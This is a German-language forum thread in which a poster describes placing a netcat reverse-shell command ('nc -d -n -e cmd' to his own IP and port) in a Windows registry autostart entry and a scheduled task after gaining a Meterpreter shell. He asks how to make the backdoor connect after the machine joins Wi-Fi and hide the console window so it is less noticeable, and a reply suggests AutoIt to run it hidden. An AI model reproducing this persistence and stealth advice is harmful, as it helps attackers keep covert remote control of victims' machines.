Results 1 to 2 of 2

Thread: Brache hilfe bei Backdoor!

  1. #1
    Junior Member
    Join Date
    Mar 2009
    Posts
    77

    Default Brache hilfe bei Backdoor!

    Hey Leute,
    also ich hab ma n bissi mit meinem Testsystem (Win XP) rumgespielt...
    So nun hab ich mir ne Shell mit Meterpreter geholt.
    Dann wollte ich mit mit Netcat eine Backdoor "basteln".
    Hab also in der Registry nen Autostarteintrag gemacht "nc -d -n -e cmd <meineip> <port>"
    Jetzt habe ich 2 Probleme!

    1) Das Testsystem ist per WLan im Netz. Das heißt, wenn der Rechner startet hat er sich noch nich eingewählt und die Shell läuft ins leere...

    2) Ich hab dann mal per Hand (weil ich nich weiß ob und wie es von der Shell aus geht) einen "Geplante Tasks" Eintrag gemacht, der alle 10 Minuten ausgeführt wird. Damit bekomme ich dann auch meine Shell, allerdings ist das ein wenig auffällig, denn obwohl ich den -d Schalter aktiviert habe, kommt trotzdem ganz kurz das Konsolenfenster... naja und wenn das dann alle 10 Minuten auftaucht is das zu auffällig...



    Habt ihr nen Tipp wie ich es hinbekomme, das die Backdoor gesendet wird NACHDEM sich der Rechner eingewählt hat und NICHT immer das Konsolenfenster aufblinkt?

  2. #2
    Member inf_437's Avatar
    Join Date
    Feb 2010
    Posts
    57

    Default

    Dies scheint vielleicht schon ein wenig weit hergeholt, aber ich programmiere Windows-Tools mit Autoit (AutoIt v3 - Automate and Script Windows Tasks - For Free!)

    Welches sehr basic ähnlich ist, du könntest so den "geplanten Task" umgehen, da du mit autoit sehr viel mehr möglichkeiten hast und vor allem Fenster forciert im Hintergrund ausführen lassen. (cmd mit netcat)

    Lies dich ein wenig ein, wenn du Erfahrungen beim programmieren hast wird es ein Kinderspiel, ansonsten sollte es auch trotzdem sehr einfach sein.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •